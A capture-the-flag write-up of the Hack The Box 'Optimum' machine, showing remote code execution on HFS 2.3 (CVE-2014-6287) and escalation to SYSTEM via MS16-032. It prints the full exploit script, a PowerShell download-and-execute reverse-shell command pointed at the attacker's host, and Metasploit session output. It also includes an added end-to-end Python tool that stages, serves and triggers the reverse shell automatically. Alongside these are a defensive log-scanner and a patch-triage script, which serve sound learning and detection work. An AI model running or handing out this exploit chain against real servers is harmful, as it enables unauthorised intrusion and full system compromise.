Hackthebox - Optimum
Target information
Target type
Information gathering
Nmap
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.8
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-09 23:06 EST
Nmap scan report for 10.10.10.8
Host is up (0.52s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 477.43 ms 10.10.16.1
2 477.52 ms 10.10.10.8
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.98 seconds
Http
Only port 80 is open, so let's look at what the HTTP service serves.
It appears to be a file server with a login; let's see whether any weak credentials get us in.
A few weak passwords were tried without success, so let's look for another way in.
The banner identifies HttpFileServer 2.3; let's run searchsploit to see whether there are known vulnerabilities for it.
Searchsploit
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# searchsploit HttpFileServer 2.3
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There is indeed a remote command execution exploit; let's check whether it works against this host.
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# cat CVE-2014-6287.py
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse

try:
    http = urllib3.PoolManager()
    # HFS evaluates template macros in the search parameter. The leading NUL
    # byte (%00) stops the filter that should strip {.exec|...} macros, so
    # the engine still runs the command. Output is not returned (blind RCE).
    url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
    print(url)
    response = http.request('GET', url)
except Exception as ex:
    print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
    print(ex)
Let's try running it:
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# python3 CVE-2014-6287.py 10.10.10.8 80 whoami
http://10.10.10.8:80/?search=%00{.+exec|whoami.}
Nothing comes back: HFS answers with its normal search page whatever the macro did, so the injection is blind and the response alone cannot tell us whether the command ran. Let's verify it out of band.
Listen on the VPN interface locally with tcpdump, then have the target ping our own address:
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# python3 CVE-2014-6287.py 10.10.10.8 80 "ping 10.10.16.3"
http://10.10.10.8:80/?search=%00{.+exec|ping%2010.10.16.3.}
┌──(root💀kali)-[~/Desktop]
└─# tcpdump -i tun0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:25:22.516278 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [S], seq 2814804000, win 64240, options [mss 1460,sackOK,TS val 3571996960 ecr 0,nop,wscale 7], length 0
23:25:22.747740 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [S.], seq 3736611079, ack 2814804001, win 8192, options [mss 1355,nop,wscale 8,sackOK,TS val 122838 ecr 3571996960], length 0
23:25:22.747788 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3571997191 ecr 122838], length 0
23:25:22.747968 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [P.], seq 1:143, ack 1, win 502, options [nop,nop,TS val 3571997191 ecr 122838], length 142: HTTP: GET /?search=%00%7B.+exec%7Cping%2010.10.16.3.%7D HTTP/1.1
23:25:23.203303 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 1:219, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 218: HTTP: HTTP/1.1 200 OK
23:25:23.203352 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 219, win 501, options [nop,nop,TS val 3571997647 ecr 122884], length 0
23:25:23.203376 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [.], seq 219:1562, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 1343: HTTP
23:25:23.203381 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 1562, win 498, options [nop,nop,TS val 3571997647 ecr 122884], length 0
23:25:23.204028 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 1562:1679, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 117: HTTP
23:25:23.204036 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 1679, win 501, options [nop,nop,TS val 3571997647 ecr 122884], length 0
23:25:23.434280 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [.], seq 1679:3022, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 1343: HTTP
23:25:23.434317 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 3022, win 501, options [nop,nop,TS val 3571997878 ecr 122884], length 0
23:25:23.434339 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 3022:3139, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 117: HTTP
23:25:23.434346 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 3139, win 501, options [nop,nop,TS val 3571997878 ecr 122884], length 0
23:25:23.434354 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [P.], seq 3139:4164, ack 143, win 257, options [nop,nop,TS val 122884 ecr 3571997191], length 1025: HTTP
23:25:23.434359 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 4164, win 498, options [nop,nop,TS val 3571997878 ecr 122884], length 0
23:25:23.437193 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [F.], seq 143, ack 4164, win 501, options [nop,nop,TS val 3571997881 ecr 122884], length 0
23:25:23.879455 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [.], ack 144, win 257, options [nop,nop,TS val 122953 ecr 3571997881], length 0
23:25:24.151025 IP 10.10.10.8.http > 10.10.16.3.35656: Flags [F.], seq 4164, ack 144, win 257, options [nop,nop,TS val 122953 ecr 3571997881], length 0
23:25:24.151044 IP 10.10.16.3.35656 > 10.10.10.8.http: Flags [.], ack 4165, win 501, options [nop,nop,TS val 3571998595 ecr 122953], length 0
23:25:47.421881 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
23:25:48.422841 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
23:25:49.424354 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
23:25:50.425946 IP 10.10.16.3.33237 > 239.255.255.250.1900: UDP, length 172
The capture excerpt above shows only the HTTP exchange (plus SSDP chatter from our own host); the evidence that matters is ICMP echo requests from 10.10.10.8 arriving on tun0, which are easier to pick out with an icmp filter (tcpdump -i tun0 icmp). They did arrive, so the command was executed: the vulnerability is present and the exploit is usable.
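As an added example (not part of this writeup or of the EDB script), the Python below rebuilds the request the exploit sends and then turns it around into the detection a defender would want: a scanner that pulls the injected command out of access-log style request lines and reports whether the NUL-byte filter bypass was used. The log lines are constructed for this example; the first one is the request seen in the tcpdump capture above.

```python
#!/usr/bin/env python3
"""Added example, not part of the original writeup or the EDB 49125 script.

HFS 2.3 runs its template-macro engine over the ?search= value. The check
that is supposed to strip macros stops at the first NUL byte, so a leading
%00 hides {.exec|<cmd>.} from the check while the engine still evaluates
it. The server still answers with its normal search page, which is why the
command output never comes back (blind RCE).

build_hfs_exec_url rebuilds the exploit URL; the rest is the detection
side. SAMPLE_LOG is constructed (line 1 is the request from the capture).
"""
import re
from urllib.parse import quote, unquote

# Any {.exec|...} macro, with or without the '+' the exploit inserts.
_EXEC_MACRO = re.compile(r"\{\.[+ ]*exec\|(.*?)\.\}", re.IGNORECASE | re.DOTALL)


def build_hfs_exec_url(host: str, port: int, command: str) -> str:
    """Same URL the exploit script sends: NUL byte, then the exec macro."""
    return f"http://{host}:{port}/?search=%00{{.+exec|{quote(command)}.}}"


def hfs_exec_command(request_target: str):
    """Return the command injected via an exec macro in a request target
    (path + query), or None if there is none."""
    match = _EXEC_MACRO.search(unquote(request_target))
    return match.group(1) if match else None


def uses_null_bypass(request_target: str) -> bool:
    """True if the query string carries a raw NUL byte (the filter bypass)."""
    query = unquote(request_target).partition("?")[2]
    return "\x00" in query


def scan_request_lines(lines):
    """Scan access-log style lines ('... "GET <target> HTTP/1.1" ...') and
    return (line_no, injected_command, null_bypass_used) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        tokens = [t.strip('"') for t in line.split()]
        for i, token in enumerate(tokens):
            if token in ("GET", "POST") and i + 1 < len(tokens):
                target = tokens[i + 1]
                command = hfs_exec_command(target)
                if command is not None:
                    hits.append((number, command, uses_null_bypass(target)))
                break
    return hits


# Constructed sample log. Line 1 is the request seen in the tcpdump
# capture; line 3 is an attempt without the NUL byte (HFS's filter would
# catch it, but it is still an attack attempt worth alerting on).
SAMPLE_LOG = [
    '10.10.16.3 - - [09/Mar/2022:23:25:22 -0500] "GET /?search=%00%7B.+exec%7Cping%2010.10.16.3.%7D HTTP/1.1" 200 4163',
    '10.10.16.3 - - [09/Mar/2022:23:25:40 -0500] "GET /?search=report HTTP/1.1" 200 1562',
    '10.10.16.3 - - [09/Mar/2022:23:25:41 -0500] "GET /?search=%7B.exec%7Cwhoami.%7D HTTP/1.1" 200 1562',
]

if __name__ == "__main__":
    print(build_hfs_exec_url("10.10.10.8", 80, "ping 10.10.16.3"))
    for number, command, bypass in scan_request_lines(SAMPLE_LOG):
        flag = "NUL-byte bypass" if bypass else "no bypass"
        print(f"line {number}: exec macro -> {command!r} ({flag})")
```

The detector decodes the target first, so `%7B.exec%7C`, `{.exec|` and the `+`-padded form all match; matching on the raw encoded string would miss trivial variations.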
Exploitation
Method 1
Now that we know which vulnerability applies, the rest is straightforward; let's build the payload.
Following the usage example in the exploit header, the idea is to have the target run PowerShell and pull down a reverse shell, so we need a PowerShell reverse shell script:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Download this script locally; it only defines the function, so it needs one small change before it will call back on its own:
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
Append this line at the very bottom of the script and change the IP to our own VPN address (10.10.16.3) and the port to the one our listener uses (4444), then start the listener before triggering anything (for example nc -lvnp 4444).
Then serve the script over HTTP from the local directory with python3:
python3 -m http.server 80
Then use the exploit to make the target download and execute it in memory. The SysNative path is used because HFS is a 32-bit process: from a WoW64 process that alias reaches the 64-bit PowerShell, whereas a plain System32 path would be redirected to the 32-bit one.
┌──(root💀kali)-[~/Desktop/HTB/Easy/Optimum]
└─# python3 CVE-2014-6287.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"
http://10.10.10.8:80/?search=%00{.+exec|c%3A%5Cwindows%5CSysNative%5CWindowsPowershell%5Cv1.0%5Cpowershell.exe%20IEX%20%28New-Object%20Net.WebClient%29.DownloadString%28%27http%3A//10.10.16.3/Invoke-PowerShellTcp.ps1%27%29.}
PS C:\Users\kostas\Desktop> whoami
optimum\kostas
The reverse shell lands on our listener (the PS prompt above), running as optimum\kostas.
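The whole of Method 1 as one script, added here as an example and not taken from the writeup or from Nishang: it appends the invocation line to a local copy of Invoke-PowerShellTcp.ps1, serves it over HTTP, opens the listener, and only then fires the CVE-2014-6287 request. The addresses and ports (attacker 10.10.16.3, listener 4444, target 10.10.10.8:80) and the script filename are assumptions taken from this writeup.

```python
#!/usr/bin/env python3
"""Added example, not part of the original writeup and not Nishang code.
Automates Method 1 end to end. Assumes Invoke-PowerShellTcp.ps1 has
already been downloaded beside this file and that this host is
10.10.16.3 on the VPN; the target is 10.10.10.8:80.
"""
import socket
import socketserver
import sys
import threading
import urllib.request
from functools import partial
from http.server import SimpleHTTPRequestHandler
from pathlib import Path
from urllib.parse import quote

# SysNative is the WoW64 alias for the 64-bit System32: HFS is a 32-bit
# process, so this path reaches the 64-bit PowerShell.
POWERSHELL = r"c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe"
INVOKE_LINE = "Invoke-PowerShellTcp -Reverse -IPAddress {lhost} -Port {lport}"


def stage_script(script_text: str, lhost: str, lport: int) -> str:
    """Append the invocation line once, so the script calls back when IEX'd."""
    line = INVOKE_LINE.format(lhost=lhost, lport=lport)
    body = script_text.rstrip("\r\n")
    if body.endswith(line):
        return body + "\n"
    return body + "\n" + line + "\n"


def download_cradle(lhost: str, script_name: str) -> str:
    """The command HFS will run: fetch the script and IEX it in memory."""
    return (f"{POWERSHELL} IEX (New-Object Net.WebClient)"
            f".DownloadString('http://{lhost}/{script_name}')")


def exploit_url(rhost: str, rport: int, command: str) -> str:
    """CVE-2014-6287: the NUL byte hides the exec macro from HFS's filter."""
    return f"http://{rhost}:{rport}/?search=%00{{.+exec|{quote(command)}.}}"


def serve_directory(directory: Path, port: int) -> socketserver.TCPServer:
    """Equivalent of python3 -m http.server, in a background thread."""
    handler = partial(SimpleHTTPRequestHandler, directory=str(directory))
    socketserver.TCPServer.allow_reuse_address = True
    httpd = socketserver.TCPServer(("0.0.0.0", port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd


def interact(conn: socket.socket) -> None:
    """Minimal nc-style loop: target output to stdout, stdin to target."""
    def pump():
        while True:
            data = conn.recv(4096)
            if not data:
                break
            sys.stdout.write(data.decode(errors="replace"))
            sys.stdout.flush()
    threading.Thread(target=pump, daemon=True).start()
    for line in sys.stdin:
        conn.sendall(line.encode())


def run(rhost, rport, lhost, lport, script_path="Invoke-PowerShellTcp.ps1"):
    src = Path(script_path)
    www = Path("www")
    www.mkdir(exist_ok=True)
    (www / src.name).write_text(stage_script(src.read_text(), lhost, lport))
    httpd = serve_directory(www, 80)
    # The listener must be up before the request goes out: the shell calls
    # back within seconds of the download.
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("0.0.0.0", lport))
    listener.listen(1)
    url = exploit_url(rhost, rport, download_cradle(lhost, src.name))
    print("[*] sending", url)
    try:
        urllib.request.urlopen(url, timeout=15).read()  # body is just the HFS page
    except Exception as exc:  # blind RCE: an HTTP error does not mean it failed
        print("[!] request error (command may still have run):", exc)
    conn, addr = listener.accept()
    print(f"[+] reverse shell from {addr[0]}:{addr[1]}")
    try:
        interact(conn)
    finally:
        conn.close()
        httpd.shutdown()


if __name__ == "__main__":
    run("10.10.10.8", 80, "10.10.16.3", 4444)
```

Binding port 80 and running the listener both need root, which matches the kali prompt in the writeup; the HTTP response is deliberately ignored because, as shown earlier, it is the normal HFS page whether or not the command ran.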
Method 2
msf6 > search HttpFileServer 2.3
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msfconsole has a ready-made module for this. The default payload is already windows/meterpreter/reverse_tcp, so the set payload step above is redundant; what does need setting is RHOSTS, LHOST (our tun0 address) and LPORT:
msf6 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.8 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.16.3 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
With those set, run it:
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.16.3:5555
[*] Using URL: http://0.0.0.0:8080/zKFWDMqMmVKxA
[*] Local IP: http://192.168.200.128:8080/zKFWDMqMmVKxA
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /zKFWDMqMmVKxA
[*] Sending stage (175174 bytes) to 10.10.10.8
[!] Tried to delete %TEMP%\UZMLMeDqW.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.3:5555 -> 10.10.10.8:49178) at 2022-03-10 00:02:29 -0500
[*] Server stopped.
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
This also gives us a shell. Two things in the output are worth a look: the module staged a .vbs dropper in %TEMP% and could not confirm deleting it, so check and clean up on a real engagement; and the Local IP line shows the primary interface (192.168.200.128) rather than the tun0 address, yet "Payload request received" shows the target did reach our staging server over the VPN (if that step ever fails, set SRVHOST to the tun0 address explicitly). Also note that sysinfo reports an x86 Meterpreter on an x64 host; if a local exploit fails later, migrating to a 64-bit process is the first thing to try.
Privilege escalation
systeminfo (or any equivalent) lists the installed hotfixes.
Comparing that list against the known local privilege-escalation bulletins, or running Metasploit's post/multi/recon/local_exploit_suggester against the session, identifies which local exploits are worth trying.
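An added example of that comparison, not part of the writeup: it parses systeminfo output for the hotfix list and OS fields and reports which of a small set of privilege-escalation bulletins have no closing KB installed, MS16-032 among them. The systeminfo text is constructed for a Server 2012 R2 host (it is not Optimum's real hotfix list), and the bulletin-to-KB mapping is an assumption taken from Microsoft's bulletins that should be verified against MSRC before acting on it.

```python
#!/usr/bin/env python3
"""Added example, not part of the original writeup: triage `systeminfo`
output for the patches that close a few classic Windows local privilege
escalations, including MS16-032 (the Secondary Logon handle leak).
SAMPLE_SYSTEMINFO is constructed for this example.
"""
import re

# Bulletin -> KB that closes it. Assumed from public bulletin data; verify
# against MSRC. Note that on 8.1 / 2012 R2 the monthly rollups shipped
# from late 2016 supersede these KBs, so a "missing" KB on a host with
# recent rollups is a candidate to test, not proof of exposure.
PRIVESC_PATCHES = {
    "MS15-051": {"KB3045171"},   # Win32k elevation of privilege
    "MS16-032": {"KB3139914"},   # Secondary Logon handle leak
}

_HOTFIX = re.compile(r"\[\d+\]:\s*(KB\d+)")
_FIELD = re.compile(r"^(OS Name|OS Version|System Type):\s*(.+?)\s*$", re.MULTILINE)


def installed_hotfixes(systeminfo_text: str) -> set:
    """All KB identifiers listed under Hotfix(s)."""
    return set(_HOTFIX.findall(systeminfo_text))


def os_summary(systeminfo_text: str) -> dict:
    """OS Name / OS Version / System Type, for sanity-checking the target."""
    return {key: value for key, value in _FIELD.findall(systeminfo_text)}


def missing_privesc_patches(systeminfo_text: str) -> dict:
    """Bulletins for which none of the closing KBs is installed."""
    have = installed_hotfixes(systeminfo_text)
    return {bulletin: kbs for bulletin, kbs in PRIVESC_PATCHES.items()
            if not (kbs & have)}


# Constructed sample; only the host name and OS version match the box.
SAMPLE_SYSTEMINFO = """\
Host Name:                 OPTIMUM
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 4 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
                           [04]: KB3045171
"""

if __name__ == "__main__":
    info = os_summary(SAMPLE_SYSTEMINFO)
    print(f"{info.get('OS Name')} ({info.get('System Type')})")
    print("installed:", ", ".join(sorted(installed_hotfixes(SAMPLE_SYSTEMINFO))))
    for bulletin, kbs in missing_privesc_patches(SAMPLE_SYSTEMINFO).items():
        print(f"candidate: {bulletin} (none of {sorted(kbs)} installed)")
```

Feed it real output with `systeminfo > sysinfo.txt` on the target and read the file instead of the constant; the System Type field is also the quick check for the x86-vs-x64 payload mismatch visible in the Meterpreter sysinfo above.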
Here Metasploit has a working module for MS16-032 (the Secondary Logon handle privilege escalation); point it at the Meterpreter session, with the payload calling back to our tun0 address (10.10.16.3:4444 in the run below):
use windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
exploit
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[+] Compressed size: 1016
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\IQyTwKukUqs.ps1...
[*] Compressing script contents...
[+] Compressed size: 3588
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1936
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 2024
[+] Resuming thread..
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
xQiD0FWfxy0Q3rUwptuxobxZ7Fk20m8U
[+] Executed on target machine.
[*] Sending stage (200262 bytes) to 10.10.10.8
[*] Meterpreter session 2 opened (10.10.16.3:4444 -> 10.10.10.8:49188) at 2022-03-10 00:34:05 -0500
[+] Deleted C:\Users\kostas\AppData\Local\Temp\IQyTwKukUqs.ps1
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We now have SYSTEM.
meterpreter > search -f user.txt.txt
Found 1 result...
c:\Users\kostas\Desktop\user.txt.txt (32 bytes)
meterpreter > cat 'c:\Users\kostas\Desktop\user.txt.txt'
d0c39409d7b994a9a1389ebf38ef5f73
meterpreter > search -f root.txt
Found 1 result...
c:\Users\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cat 'c:\Users\Administrator\Desktop\root.txt'
51ed1b36553c8461f4552c2e92b3eeed
Both the user and root flags are captured.